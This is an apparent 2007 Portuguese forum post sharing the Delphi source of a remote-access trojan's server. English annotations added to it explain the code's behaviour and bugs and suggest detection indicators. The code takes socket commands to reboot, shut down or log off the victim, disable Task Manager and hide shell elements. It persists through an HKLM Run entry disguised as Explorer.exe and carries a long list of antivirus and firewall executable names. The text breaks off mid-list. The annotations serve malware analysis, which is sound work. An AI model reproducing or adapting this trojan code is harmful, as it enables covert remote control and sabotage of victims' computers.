Criando um Trojan ~ Com alguns adicionais Parte 2

Iniciado por Anonymous, 06 de Setembro , 2007, 04:41:49 PM


Anonymous

Server

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, ExtCtrls, ScktComp, mmsystem, Registry, StdCtrls, ComCtrls, ShellAPI,
  XPMan, jpeg, Buttons, TLHelp32;

type
  // Main form of the "Server" program, i.e. the half that runs on the
  // controlled machine. Despite the name it owns a TClientSocket, so it is the
  // side that opens the connection. The socket's host/port and the timer
  // interval are not set anywhere in this unit (presumably in the .dfm, which
  // is not shown).
  TForm1 = class(TForm)
    // Outbound socket on which commands are received and status text is sent.
    hcClient: TClientSocket;
    // Drives Timer1Timer, which re-activates hcClient whenever it is inactive.
    Timer1: TTimer;
    XPManifest1: TXPManifest;
    // Image1, Edit1, Edit2 and Memo1 are not referenced by the code shown here.
    Image1: TImage;
    Edit1: TEdit;
    Edit2: TEdit;
    Memo1: TMemo;
    procedure Timer1Timer(Sender: TObject);
    procedure hcClientError(Sender: TObject; Socket: TCustomWinSocket;
      ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure hcClientRead(Sender: TObject; Socket: TCustomWinSocket);
  private
    { Private declarations }
  public
      {Conective =)}
  end;

// Unit-level state shared by the handlers below.
var
  Form1: TForm1;
  // Registry object used by the Run-key branches of hcClientRead.
  hcReg:TRegistry;
  // Loop counter of the 'flood_pc' branch.
  I:integer;
  // Canvas and device context used by the 'mouse_pc' / 'mouse2_pc' branches.
  C: TCanvas;
  D: HDC;
  // Read by the mouse branches but never assigned in the code shown here.
  hcPT : TPoint;
  // Registry object used by the Task Manager policy branches.
  DTM: Tregistry;
  // Lista and a are not referenced by the code shown here.
  Lista: TStringList;
  a : string;
  // FinalizarProcesso declares its own locals with these three names, so it
  // does not use these unit-level copies.
  Handle:THandle;
  Proc:TProcessEntry32W;
  PID:Integer;
 
const
// Registry path of the per-user/per-machine Policies key. Not referenced by the
// code shown here; the Task Manager branches spell the path out inline.
sRegPolicies = '\Software\Microsoft\Windows\CurrentVersion\Policies';

implementation

{$R *.dfm}

// Terminates the first running process whose executable name equals Nome.
// Takes a Toolhelp snapshot, walks the process list comparing szExeFile with
// Nome (the = operator is an exact, case-sensitive match), and if a match was
// found opens that process and calls TerminateProcess with exit code 0.
// Not called anywhere in the part of the unit shown here.
Procedure FinalizarProcesso(Nome:String);
var
  Handle:THandle;
  Proc:TProcessEntry32W;
  PID:Integer;
begin
  // -1 means "no matching process found".
  PID:=-1;
  // 15 = heap-list, process, thread and module snapshot flags combined.
  Handle:=CreateToolHelp32SnapShot(15,0);
  // dwSize must be filled in before the first Process32FirstW call.
  Proc.dwSize:=SizeOf(TProcessEntry32W);
  Try
    // NOTE(review): neither the snapshot handle nor this call's result is checked.
    Process32FirstW(Handle,Proc);
    Repeat
      if Nome=Proc.szExeFile then begin
        PID:=Proc.TH32ProcessID;
        Break;
      end;
    Until not Process32NextW(Handle,Proc);
  Finally CloseHandle(Handle);
  end;
  // 2035711 = $1F0FFF, the full process access mask. The handle returned by
  // OpenProcess is passed straight to TerminateProcess and never closed.
  if PID<>-1 then TerminateProcess(OpenProcess(2035711,True,PID),0);
end;

// Returns the Windows system directory as reported by GetSystemDirectory,
// with a trailing backslash appended when the API result does not end in one.
// Used below to build the path <system dir>\Explorer.exe.
function GetMySysDir:string;
var buf:string;
    lng:integer;
begin
 // Fixed 255-character buffer; lng receives the length the API wrote.
 SetLength(buf,255);
 lng:=GetSystemDirectory(PChar(buf),255);
 Result:=Copy(buf,1,lng);
 // Make sure the result can be concatenated directly with a file name.
 if Copy(Result,lng,1)<>'\' then
  Result:=Concat(Result,'\');
end;

// Timer tick: if the outbound socket is not active, activate it again.
// Together with hcClientError (which silences socket errors) this makes the
// program retry its connection on every tick for as long as it runs, which
// shows up on the network as repeated outbound connection attempts to one
// endpoint. The interval and the endpoint are not set in this unit.
procedure TForm1.Timer1Timer(Sender: TObject);
begin
if not hcClient.Active then
hcClient.Active := true;
end;

// Socket error handler: sets ErrorCode to 0, which tells the socket component
// the error was handled, so no exception or error dialog reaches the user when
// a connection attempt fails.
procedure TForm1.hcClientError(Sender: TObject; Socket: TCustomWinSocket;
  ErrorEvent: TErrorEvent; var ErrorCode: Integer);
begin
errorcode:=0;
end;

// Command dispatcher for the outbound socket. The text returned by one
// ReceiveText call is treated as one command: it is compared for exact
// equality with a fixed set of strings, the matching action runs, a Portuguese
// status string is sent back, and the handler exits. Nothing in this handler
// authenticates the peer or protects the channel.
//
// Reading notes for analysis:
// - The Win32 calls used here report failure through return values, not
//   exceptions, and no return value is checked. The "success" reply is
//   therefore sent whether or not the action took effect; a reply seen in
//   captured traffic does not prove the action happened.
// - The condition of the {Registry} branch is true for every command except
//   'system_pc' (see the note there), so as written every branch below it is
//   unreachable.
// - 'relogio_pc' and 'flood_pc' each appear in two conditions; only the first
//   occurrence of each could ever match.
procedure TForm1.hcClientRead(Sender: TObject; Socket: TCustomWinSocket);
var
Conective : string;
begin
// Whatever text is currently buffered on the socket becomes the command.
Conective := socket.ReceiveText;

{Open CD-ROM tray}

if Conective = 'abrir_cd' then
begin
try
mciSendString('Set cdaudio door open wait', nil, 0, handle);
socket.SendText('CD|DVD aberto com sucesso');
except
socket.SendText('Não foi possivel abrir CD|DVD');
end;
exit;
end;

{Close CD-ROM tray}

if Conective = 'fechar_cd' then
begin
try
mciSendString('Set cdaudio door closed wait', nil, 0, handle);
socket.SendText('CD|DVD fechado com sucesso');
except
socket.SendText('Não foi possivel fechar CD|DVD');
end;
exit;
end;

{Reboot the machine}

if Conective = 'reiniciar_pc' then
begin
try
ExitWindowsEx(EWX_REBOOT,0);
socket.SendText('Computador Reiniciado');
except
socket.SendText('Não foi possivel reiniciar o Computador');
end;
exit;
end;

{Shut the machine down}

if Conective = 'desligar_pc' then
begin
try
ExitWindowsEx(EWX_SHUTDOWN,0);
socket.SendText('Computador Desligado');
except
socket.SendText('Não foi possivel desligar o Computador');
end;
exit;
end;

{Log the user off}

if Conective = 'logoff_pc' then
begin
try
ExitWindowsEx(EWX_LOGOFF,0);
socket.SendText('Logoff Completado');
except
socket.SendText('Não foi possivel fazer logoff');
end;
exit;
end;

{Forced shutdown, according to the reply text}

// NOTE(review): EWX_FORCE is passed on its own, without EWX_SHUTDOWN, so this
// looks like a forced logoff rather than a shutdown - confirm.
if Conective = 'desligarforte_pc' then
begin
try
ExitWindowsEx(EWX_FORCE,0);
socket.SendText('Computador Desligado à Força Bruta');
except
socket.SendText('Não Foi Possivel desligar o Computador com Força Bruta');
end;
exit;
end;

{Enable Windows Task Manager}

// Sets DisableTaskMgr = 0 under the current user's Policies\system key,
// creating the key if it is missing (second OpenKey argument is true).
if Conective = 'gerenciadorativar_pc' then
begin
try
DTM:= tregistry.Create;
DTM.RootKey:= HKEY_CURRENT_USER;
DTM.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\system\',true);
DTM.WriteInteger('DisableTaskMgr',0);
DTM.Free;
socket.SendText('Gerenciador de Tarefas Ativado');
except
socket.SendText('Não Foi Possivel ativar o Gerenciador de Tarefas');
end;
exit;
end;

{Disable Windows Task Manager}

// Sets DisableTaskMgr = 1 under the same HKCU key; here OpenKey is told not to
// create the key, and its result is not checked. A DisableTaskMgr value of 1
// that no administrator policy accounts for is a registry artefact worth
// alerting on.
if Conective = 'gerenciadordesativar_pc' then
begin
try
DTM:= tregistry.Create;
DTM.RootKey:= HKEY_CURRENT_USER;
DTM.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\system\',false);
DTM.WriteInteger('DisableTaskMgr',1);
DTM.Free;
socket.SendText('Gerenciador de Tarefas Desativado');
except
socket.SendText('Não Foi Possivel desativar o Gerenciador de Tarefas');
end;
exit;
end;

{StandBy}

// Sends the SC_MonitorPower system command to the application's own window.
// NOTE(review): that command concerns display power, not system suspend; the
// reply text calls it StandBy.
if Conective = 'standby_pc' then
begin
try
SendMessage(Application.Handle, wm_SysCommand, SC_MonitorPower, 0);
socket.SendText('Modo StandBy ativado');
except
socket.SendText('Não Foi Possivel entrar em modo StandBy');
end;
exit;
end;

{Cursor}

// Moves the mouse cursor once, to a random point inside an 800x600 area.
if Conective = 'cursor_pc' then
begin
try
SetCursorPos(Random(800),Random(600));
socket.SendText('Curso Maluco Ativado');
except
socket.SendText('Não Foi Possivel ativar o Cursor Maluco');
end;
exit;
end;

{Close the Start button}

// Posts WM_CLOSE to the 'Button' child window of the taskbar (Shell_TrayWnd).
if Conective = 'matariniciar_pc' then
begin
try
PostMessage(FindWindowEx(FindWindow('Shell_TrayWnd',nil),0,'Button',nil),WM_CLOSE,0,0);
socket.SendText('Botão do Iniciar Finalizado');
except
socket.SendText('Não Foi Possivel finalizar com o botão do iniciar');
end;
exit;
end;

{Hide desktop icons}

// Hides the window titled 'Program Manager' (the desktop window).
if Conective = 'escondericones_pc' then
begin
try
ShowWindow(FindWindow(nil,'Program Manager'),SW_HIDE);
socket.SendText('ícones Escondidos');
except
socket.SendText('Não Foi Possivel esconder os ícones');
end;
exit;
end;

{Show desktop icons}

if Conective = 'mostraricones_pc' then
begin
try
ShowWindow(FindWindow(nil,'Program Manager'),SW_SHOW);
socket.SendText('Icones Ativados na area de trabalho');
except
socket.SendText('Não Foi Possivel mostrar os icones');
end;
exit;
end;

{Hide the taskbar}

if Conective = 'tarefaocultada_pc' then
begin
try
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_HIDE);
socket.SendText('Barra de Tarefas Ocultado');
except
socket.SendText('Não Foi Possivel ocultar a barra de tarefas');
end;
exit;
end;

{Show the taskbar}

if Conective = 'mostrartarefa_pc' then
begin
try
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_SHOWNORMAL);
socket.SendText('Barra de Tarefas Ativada');
except
socket.SendText('Não Foi Possivel mostrar a barra de tarefas');
end;
exit;
end;

{KeyLogger}

// Despite the label, this branch captures no keystrokes: its body is a copy of
// the "show the taskbar" branch above, including the reply strings.
if Conective = 'keylogger_pc' then
begin
try
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_SHOWNORMAL);
socket.SendText('Barra de Tarefas Ativada');
except
socket.SendText('Não Foi Possivel mostrar a barra de tarefas');
end;
exit;
end;

{Registry: autostart entry}

// The condition parses as (Conective = 'system_pc') = False, so it is true for
// every command that reached this point EXCEPT 'system_pc'. Any other text,
// including the command names tested further down, lands here and the handler
// exits afterwards.
// Effect: writes the value 'Explorer' = <system dir>\Explorer.exe under
// HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. OpenKey's result is not
// checked, no success reply is sent, and hcReg is never freed.
// Detection: the legitimate Explorer.exe lives in the Windows directory, not
// the system directory, so a Run value named 'Explorer' pointing into the
// system directory, or an Explorer.exe file there, is a strong indicator.
if Conective = 'system_pc' = False then
begin
try
hcReg:=TRegistry.Create;
hcReg.RootKey:=HKEY_LOCAL_MACHINE;
hcReg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',False);
hcReg.WriteString('Explorer',GetMySysDir+'Explorer.exe')
except
socket.SendText('Não Foi Possivel criar registro');
end;
exit;
end;

{Copy the Server into the system folder}

// Copies the running executable to <system dir>\Explorer.exe, overwriting an
// existing file (last CopyFile argument is False). Unreachable as written:
// 'system2_pc' is consumed by the branch above.
if Conective = 'system2_pc' then
begin
try
CopyFile(PChar(Application.ExeName),PChar(ConCat(GetMySysDir,'Explorer.exe')), False);
socket.SendText('Server na Pasta System');
except
socket.SendText('Não Foi enviar o Server para a pasta system');
end;
exit;
end;

{Delete the autostart entry}

// Deletes the 'Explorer' value from the HKLM Run key. Unreachable as written,
// for the same reason as the branch above.
if Conective = 'system3_pc' = True then
begin
try
hcReg:=TRegistry.Create;
hcReg.RootKey:=HKEY_LOCAL_MACHINE;
hcReg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',False);
hcReg.DeleteValue('Explorer');
except
socket.SendText('Não Foi enviar deletar o registro');
end;
exit;
end;

{Hide the tray clock}

// Hides the TrayClockWClass window inside the taskbar's notification area.
if Conective = 'relogio_pc' then
begin
try
ShowWindow(FindWindowEx(FindWindowEx(FindWindow('shell_traywnd',nil),0,'TrayNotifyWnd',nil),0,'TrayClockWClass',nil),0);
socket.SendText('Relógio Escondido');
except
socket.SendText('Não Foi possivel sumir com o relogio');
end;
exit;
end;

{Restore the tray clock}

// Tests the same string as the branch above, so this one can never match.
if Conective = 'relogio_pc' then
begin
try
ShowWindow(FindWindowEx(FindWindowEx(FindWindow('shell_traywnd',nil),0,'TrayNotifyWnd',nil),0,'TrayClockWClass',nil),1);
socket.SendText('Relógio Restaurado');
except
socket.SendText('Não Foi possivel restaurar o relogio');
end;
exit;
end;

{Flood}

// Tries to create up to 10000 empty files named 'Testing 1' .. 'Testing 10000'
// by relative name, i.e. in the process's current directory. The returned
// handles are discarded without being closed. A burst of 'Testing N' files in
// one directory is the on-disk artefact of this branch.
if Conective = 'flood_pc' then
begin
try
For I := 1 To 10000 do
CreateFile(PChar('Testing ' + IntToStr(i)),0,0,0,CREATE_NEW,FILE_ATTRIBUTE_NORMAL,0);
socket.SendText('Flood Realizado');
except
socket.SendText('Não Foi possivel realizar flood');
end;
exit;
end;

{Lock the mouse, according to the reply text}

// What the code does: enables Form1, moves the cursor to hcPT minus 100 on each
// axis (hcPT is never assigned in the code shown, so presumably the screen's
// top-left corner), then draws a few short lines near the cursor and the text
// 'Conective Trojan' at a random position directly on the screen DC. The DC
// obtained with GetDC(0) is not released. Nothing here blocks mouse input.
if Conective = 'mouse_pc' then
begin
try
Form1.Enabled:=true;
SetCursorPos(hcPT.x - 100, hcPT.y - 100);
  D := GetDC( 0 );
  C := Canvas;
  C.Handle := (D);
Randomize;
C.PenPos := Mouse.CursorPos;
C.LineTo(Mouse.CursorPos.x-Random(10),Mouse.CursorPos.y-Random(10));
C.LineTo(Mouse.CursorPos.x+Random(10),Mouse.CursorPos.y+Random(10));
C.LineTo(Mouse.CursorPos.y-Random(10),Mouse.CursorPos.x-Random(10));
C.LineTo(Mouse.CursorPos.y+Random(10),Mouse.CursorPos.x+Random(10));
C.TextOut(Random(Screen.Width),Random(Screen.height),'Conective Trojan');
socket.SendText('Mouse Travado');
except
socket.SendText('Não Foi possivel travar Mouse');
end;
exit;
end;

{Unlock the mouse, according to the reply text}

// Same body as the branch above except that Form1 is disabled instead of
// enabled and the reply strings differ.
if Conective = 'mouse2_pc' then
begin
try
Form1.Enabled:=false;
SetCursorPos(hcPT.x - 100, hcPT.y - 100);
  D := GetDC( 0 );
  C := Canvas;
  C.Handle := (D);
Randomize;
C.PenPos := Mouse.CursorPos;
C.LineTo(Mouse.CursorPos.x-Random(10),Mouse.CursorPos.y-Random(10));
C.LineTo(Mouse.CursorPos.x+Random(10),Mouse.CursorPos.y+Random(10));
C.LineTo(Mouse.CursorPos.y-Random(10),Mouse.CursorPos.x-Random(10));
C.LineTo(Mouse.CursorPos.y+Random(10),Mouse.CursorPos.x+Random(10));
C.TextOut(Random(Screen.Width),Random(Screen.height),'Conective Trojan');
socket.SendText('Mouse Desbloqueado');
except
socket.SendText('Não Foi possivel desbloquear Mouse');
end;
exit;
end;

{Kill AV and Firewall}

// This branch tests 'flood_pc', the same string as the {Flood} branch above,
// so it can never match. Its body passes each listed name to WinExec, which
// asks Windows to start a program of that name; nothing in this branch
// terminates a process, whatever the reply text says. The list itself is
// useful to defenders as a signature: a binary embedding this run of
// antivirus, firewall and system-tool file names is characteristic of
// security-tool tampering code of this era.
if Conective = 'flood_pc' then
begin
try
WinExec('_AVPM.EXE',1);
WinExec('AVP32.EXE',1);
WinExec('AVPCC.EXE',1);
WinExec('AVPM.EXE',1);
WinExec('AVP.EXE',1);
WinExec('NAVAPW32.EXE',1);
WinExec('NAVW32.EXE',1);
WinExec('ICLOAD95.EXE',1);
WinExec('ICMON.EXE',1);
WinExec('ICSUPP95.EXE',1);
WinExec('ICLOADNT.EXE',1);
WinExec('ICSUPPNT.EXE',1);
WinExec('IFACE.EXE',1);
WinExec('ANTS.EXE',1);
WinExec('Anti-Trojan.exe',1);
WinExec('iamapp.exe',1);
WinExec('iamserv.exe',1);
WinExec('FRW.EXE',1);
WinExec('blackice.exe',1);
WinExec('blackd.exe',1);
WinExec('zonealarm.exe',1);
WinExec('vsmon.exe',1);
WinExec('WrCtrl.exe',1);
WinExec('WrAdmin.exe',1);
WinExec('WrCtrl.exe',1);
WinExec('cleaner3.exe',1);
WinExec('cleaner.exe',1);
WinExec('tca.exe',1);
WinExec('MooLive.exe',1);
WinExec('lockdown2000.exe',1);
WinExec('Sphinx.exe',1);
WinExec('VSHWIN32.EXE',1);
WinExec('VSECOMR.EXE',1);
WinExec('WEBSCANX.EXE',1);
WinExec('AVCONSOL.EXE',1);
WinExec('VSSTAT.EXE',1);
WinExec('ACKWIN32.EXE',1);
WinExec('ADVXDWIN.EXE',1);
WinExec('AGENTSVR.EXE',1);
WinExec('AHNSD.EXE',1);
WinExec('ALERTSVC.EXE',1);
WinExec('ALOGSERV.EXE',1);
WinExec('AMON9X.EXE',1);
WinExec('ANTI-TROJAN.EXE',1);
WinExec('ANTIVIRUS.EXE',1);
WinExec('ANTS.EXE',1);
WinExec('APIMONITOR.EXE',1);
WinExec('APLICA32.EXE',1);
WinExec('APVXDWIN.EXE',1);
WinExec('ATCON.EXE',1);
WinExec('ATGUARD.EXE',1);
WinExec('ATRO55EN.EXE',1);
WinExec('ATUPDATER.EXE',1);
WinExec('ATWATCH.EXE',1);
WinExec('AUPDATE.EXE',1);
WinExec('AUTODOWN.EXE',1);
WinExec('AUTODOWN.exe',1);
WinExec('AUTOTRACE.EXE',1);
WinExec('AUTOUPDATE.EXE',1);
WinExec('AVCONSOL.EXE ',1);
WinExec('AVGCC32.EXE',1);
WinExec('AVGCTRL.EXE',1);
WinExec('AVGSERV.EXE',1);
WinExec('AVGSERV9.EXE',1);
WinExec('AVGW.EXE',1);
WinExec('AVKPOP.EXE',1);
WinExec('AVKSERV.EXE',1);
WinExec('AVKSERVICE.EXE',1);
WinExec('AVKWCL9.EXE',1);
WinExec('AVKWCTL9.EXE',1);
WinExec('AVP.EXE',1);
WinExec('AVP32.EXE',1);
WinExec('AVPCC.EXE',1);
WinExec('AVPEXEC.EXE',1);
WinExec('AVPINST.EXE',1);
WinExec('AVPM.EXE',1);
WinExec('AVPUPD.EXE',1);
WinExec('AVRESCUE.EXE',1);
WinExec('AVSYNMGR.EXE',1);
WinExec('AVSYNMGR.exe',1);
WinExec('AVWINNT.EXE',1);
WinExec('AVXMONITOR9X.EXE',1);
WinExec('AVXMONITORNT.EXE',1);
WinExec('AVXQUAR.EXE',1);
WinExec('AVXQUAR.EXE.EXE',1);
WinExec('AVXW.EXE',1);
WinExec('AckWin32.exe',1);
WinExec('Alerter',1);
WinExec('AutoDown.exe',1);
WinExec('AutoTrace.exe',1);
WinExec('AvSynMgr',1);
WinExec('AvgServ',1);
WinExec('Avgctrl.exe',1);
WinExec('AvkServ.exe',1);
WinExec('Avsched32.exe',1);
WinExec('BD_PROFESSIONAL.EXE',1);
WinExec('BIDEF.EXE',1);
WinExec('BIDSERVER.EXE',1);
WinExec('BIPCP.EXE',1);
WinExec('BIPCPEVALSETUP.EXE',1);
WinExec('BISP.EXE',1);
WinExec('BLACKD.EXE',1);
WinExec('BLACKICE.EXE',1);
WinExec('BOOTWARN.EXE',1);
WinExec('BORG2.EXE',1);
WinExec('BS120.EXE',1);
WinExec('BlackICE.exe',1);
WinExec('CDP.EXE',1);
WinExec('CFGWIZ.EXE',1);
WinExec('CFIADMIN.EXE',1);
WinExec('CFIAUDIT.EXE',1);
WinExec('CFINET.EXE',1);
WinExec('CFINET32.EXE',1);
WinExec('CLAW95.EXE',1);
WinExec('CLAW95CF.EXE',1);
WinExec('CLEAN.EXE',1);
WinExec('CLEANER.EXE',1);
WinExec('CLEANER3.EXE',1);
WinExec('CLEANPC.EXE',1);
WinExec('CMGRDIAN.EXE',1);
WinExec('CMON016.EXE',1);
WinExec('CONNECTIONMONITOR.EXE',1);
WinExec('CPD.EXE',1);
WinExec('CPDCLNT.EXE',1);
WinExec('CPDClnt.exe',1);
WinExec('CPF9X206.EXE',1);
WinExec('CPFNT206.EXE',1);
WinExec('CSINJECT.EXE',1);
WinExec('CSINSM32',1);
WinExec('CSS 1631.EXE',1);
WinExec('CTRL.EXE',1);
WinExec('CV.EXE',1);
WinExec('CWNB181.EXE',1);
WinExec('CWNTDWMO.EXE',1);
WinExec('Claw95.exe',1);
WinExec('Claw95cf.exe',1);
WinExec('DEFSCANGUI.EXE',1);
WinExec('DEFWATCH.EXE',1);
WinExec('DEPUTY.EXE',1);
WinExec('DOORS.EXE',1);
WinExec('DPF.EXE',1);
WinExec('DRWATSON.EXE',1);
WinExec('DRWEB32.EXE',1);
WinExec('DVP95.EXE',1);
WinExec('DVP95_0.EXE',1);
WinExec('EFPEADM.EXE',1);
WinExec('EFPEADM.exe',1);
WinExec('ENT.EXE',1);
WinExec('ESCANH95.EXE',1);
WinExec('ESCANHNT.EXE',1);
WinExec('ESCANV95.EXE',1);
WinExec('ETRUSTCIPE.EXE',1);
WinExec('ETRUSTCIPE.exe',1);
WinExec('EVPN.EXE',1);
WinExec('EVPN.exe',1);
WinExec('EXANTIVIRUS-CNET.EXE',1);
WinExec('EXPERT.EXE',1);
WinExec('F-AGNT95.EXE',1);
WinExec('F-PROT.EXE',1);
WinExec('F-PROT95.EXE',1);
WinExec('F-STOPW.EXE',1);
WinExec('FAMEH32.EXE',1);
WinExec('FAST.EXE',1);
WinExec('FCH32.EXE',1);
WinExec('FIH32.EXE',1);
WinExec('FIREWALL.EXE',1);
WinExec('FIX-IT.EXE',1);
WinExec('FLOWPROTECTOR.EXE',1);
WinExec('FNRB32.EXE',1);
WinExec('FP-WIN.EXE',1);
WinExec('FP-WIN_TRIAL.EXE',1);
WinExec('FRW.EXE',1);
WinExec('FSAA.EXE',1);
WinExec('FSAV.EXE',1);
WinExec('FSAV32.EXE',1);
WinExec('FSAV530STBYB.EXE',1);
WinExec('FSAV530WTBYB.EXE',1);
WinExec('FSAV95.EXE',1);
WinExec('FSAVE32.EXE',1);
WinExec('FSGK32.EXE',1);
WinExec('FSM32.EXE',1);
WinExec('FSMA32.EXE',1);
WinExec('FSMB32.EXE',1);
WinExec('FWENC.EXE',1);
WinExec('GBMENU.EXE',1);
WinExec('GBPOLL.EXE',1);
WinExec('GENERICS.EXE',1);
WinExec('GUARD.EXE',1);
WinExec('GUARDDOG.EXE',1);
WinExec('HACKTRACERSETUP.EXE',1);
WinExec('HTLOG.EXE',1);
WinExec('HWPE.EXE',1);
WinExec('IAMAPP.EXE',1);
WinExec('IAMSERV.EXE',1);
WinExec('IAMSTATS.EXE',1);
WinExec('ICLOAD95.EXE',1);
WinExec('ICLOADNT.EXE',1);
WinExec('ICMON.EXE',1);
WinExec('ICSUPP95.EXE',1);
WinExec('ICSUPP95.EXE',1);
WinExec('ICSUPPNT.EXE',1);
WinExec('IFACE.EXE',1);
WinExec('IFW2000.EXE',1);
WinExec('IOMON98.EXE',1);
WinExec('IPARMOR.EXE',1);
WinExec('IRIS.EXE',1);
WinExec('ISRV95.EXE',1);
WinExec('JAMMER.EXE',1);
WinExec('JEDI.EXE',1);
WinExec('KAVLITE40ENG.EXE',1);
WinExec('KAVPERS40ENG.EXE',1);
WinExec('KERIO-PF-213-EN-WIN.EXE',1);
WinExec('KERIO-WRL-421-EN-WIN.EXE',1);
WinExec('KERIO-WRP-421-EN-WIN.EXE',1);
WinExec('KILLPROCESSSETUP161.EXE',1);
WinExec('LDNETMON.EXE',1);
WinExec('LDPRO.EXE',1);
WinExec('LDPROMENU.EXE',1);
WinExec('LDSCAN.EXE',1);
WinExec('LOCALNET.EXE',1);
WinExec('LOCKDOWN.EXE',1);
WinExec('LOCKDOWN2000.EXE',1);
WinExec('LSETUP.EXE',1);
WinExec('LUALL.EXE',1);
WinExec('LUAU.EXE',1);
WinExec('LUCOMSERVER.EXE',1);
WinExec('LUINIT.EXE',1);
WinExec('LUSPT.exe',1);
WinExec('MCAGENT.EXE',1);
WinExec('MCMNHDLR.EXE',1);
WinExec('MCSHIELD.EXE',1);
WinExec('MCTOOL.EXE',1);
WinExec('MCUPDATE.EXE',1);
WinExec('MCVSRTE.EXE',1);
WinExec('MCVSSHLD.EXE',1);
WinExec('MFW2EN.EXE',1);
WinExec('MFWENG3.02D30.EXE',1);
WinExec('MGAVRTCL.EXE',1);
WinExec('MGAVRTE.EXE',1);
WinExec('MGHTML.EXE',1);
WinExec('MGUI.EXE',1);
WinExec('MINILOG.EXE',1);
WinExec('MONITOR.EXE',1);
WinExec('MONSYS32.EXE',1);
WinExec('MONSYSNT.EXE',1);
WinExec('MONWOW.EXE',1);
WinExec('MOOLIVE.EXE',1);
WinExec('MPFAGENT.EXE',1);
WinExec('MPFSERVICE.exe',1);
WinExec('MPFTRAY.EXE',1);
WinExec('MRFLUX.EXE',1);
WinExec('MSINFO32.EXE',1);
WinExec('MSSMMC32.EXE',1);
WinExec('MU0311AD.EXE',1);
WinExec('MWATCH.EXE',1);
WinExec('MWATCH.exe',1);
WinExec('MXTASK.EXE',1);
WinExec('Mcshield.exe',1);
WinExec('Monitor.exe',1);
WinExec('NAV Auto-Protect',1);
WinExec('NAV80TRY.EXE',1);
WinExec('NAVAP',1);
WinExec('NAVAPSVC.EXE',1);
WinExec('NAVAPW32.EXE',1);
WinExec('NAVDX.EXE',1);
WinExec('NAVENG',1);
WinExec('NAVENGNAVEX15',1);
WinExec('NAVEX15',1);
WinExec('NAVLU32.EXE',1);
WinExec('NAVRUNR.EXE',1);
WinExec('NAVSTUB.EXE',1);
WinExec('NAVW32.EXE',1);
WinExec('NAVWNT.EXE',1);
WinExec('NC2000.EXE',1);
WinExec('NCINST4.EXE',1);
WinExec('NDD32.EXE',1);
WinExec('NEOMONITOR.EXE',1);
WinExec('NEOWATCHLOG.EXE',1);
WinExec('NETARMOR.EXE',1);
WinExec('NETINFO.EXE',1);
WinExec('NETMON.EXE',1);
WinExec('NETSCANPRO.EXE',1);
WinExec('NETSPYHUNTER-1.2.EXE',1);
WinExec('NETSTAT.EXE',1);
WinExec('NETUTILS.EXE',1);
WinExec('NISSERV.EXE',1);
WinExec('NISUM.EXE',1);
WinExec('NMAIN.EXE',1);
WinExec('NORMIST.EXE',1);
WinExec('NORTON_INTERNET_SECU_3.0_407.EXE',1);
WinExec('NPF40_TW_98_NT_ME_2K.EXE',1);
WinExec('NPFMESSENGER.EXE',1);
WinExec('NPROTECT.EXE',1);
WinExec('NPSSVC.EXE',1);
WinExec('NSCHED32.EXE',1);
WinExec('NTVDM.EXE',1);
WinExec('NTXCONFIG.EXE',1);
WinExec('NTXconfig.exe',1);
WinExec('NUI.EXE',1);
WinExec('NVARCH16.EXE',1);
WinExec('NVC95.EXE',1);
WinExec('NVLAUNCH.EXE',1);
WinExec('NVSVC32',1);
WinExec('NWINST4.EXE',1);
WinExec('NWSERVICE.EXE',1);
WinExec('NWService.exe',1);
WinExec('NWTOOL16.EXE',1);
WinExec('Navw32.exe',1);
WinExec('NeoWatchLog.exe',1);
WinExec('Nui.EXE',1);
WinExec('Nupgrade.exe',1);
WinExec('OFFGUARD.EXE',1);
WinExec('OSTRONET.EXE',1);
WinExec('OUTPOST.EXE',1);
WinExec('OUTPOSTINSTALL.EXE',1);
WinExec('OUTPOSTPROINSTALL.EXE',1);
WinExec('PADMIN.EXE',1);
WinExec('PANIXK.EXE',1);
WinExec('PAVPROXY.EXE',1);
WinExec('PCC2002S902.EXE',1);
WinExec('PCC2K_76_1436.EXE',1);
WinExec('PCCCLIENT.EXE',1);
WinExec('PCCGUIDE.EXE',1);
WinExec('PCCIOMON.EXE',1);
WinExec('PCCNTMON.EXE',1);
WinExec('PCCPFW',1);
WinExec('PCCWIN97.EXE',1);
WinExec('PCCWIN98.EXE',1);
WinExec('PCDSETUP.EXE',1);
WinExec('PCFWALLICON.EXE',1);
WinExec('PCIP10117_0.EXE',1);
WinExec('PCSCAN.EXEPDSETUP.EXE',1);
WinExec('PERISCOPE.EXE',1);
WinExec('PERSFW.EXE ',1);
WinExec('PERSWF.EXE',1);
WinExec('PF2.EXE',1);
WinExec('PFWADMIN.EXE',1);
WinExec('PINGSCAN.EXE',1);
WinExec('PLATIN.EXE',1);
WinExec('POP3TRAP.EXE',1);
WinExec('POPROXY.EXE',1);
WinExec('POPSCAN.EXE',1);
WinExec('PORTDETECTIVE.EXE',1);
WinExec('PORTMONITOR.EXE',1);
WinExec('PPINUPDT.EXE',1);
WinExec('PPTBC.EXE',1);
WinExec('PPVSTOP.EXE',1);
WinExec('PROCESSMONITOR.EXE',1);
WinExec('PROCEXPLORERV1.0.EXE',1);
WinExec('PROGRAMAUDITOR.EXE',1);
WinExec('PROPORT.EXE',1);
WinExec('PROTECTX.EXE',1);
WinExec('PSPF.EXE',1);
WinExec('PURGE.EXE',1);
WinExec('PVIEW95.EXE',1);
WinExec('QCONSOLE.EXE',1);
WinExec('QSERVER.EXE',1);
WinExec('RAV7.EXE',1);
WinExec('RAV7WIN.EXE',1);
WinExec('RAV8WIN32ENG.EXE',1);
WinExec('REALMON.EXE',1);
WinExec('RESCUE.EXE',1);
WinExec('RESCUE32.EXE',1);
WinExec('RRGUARD.EXE',1);
WinExec('RSHELL.EXE',1);
WinExec('RTVSCN95.EXE',1);
WinExec('RULAUNCH.EXE',1);
WinExec('Rescue.exe',1);
WinExec('SAFEWEB.EXE',1);
WinExec('SBSERV.EXE',1);
WinExec('SCAN32.EXE',1);
WinExec('SCHEDAPP.EXE',1);
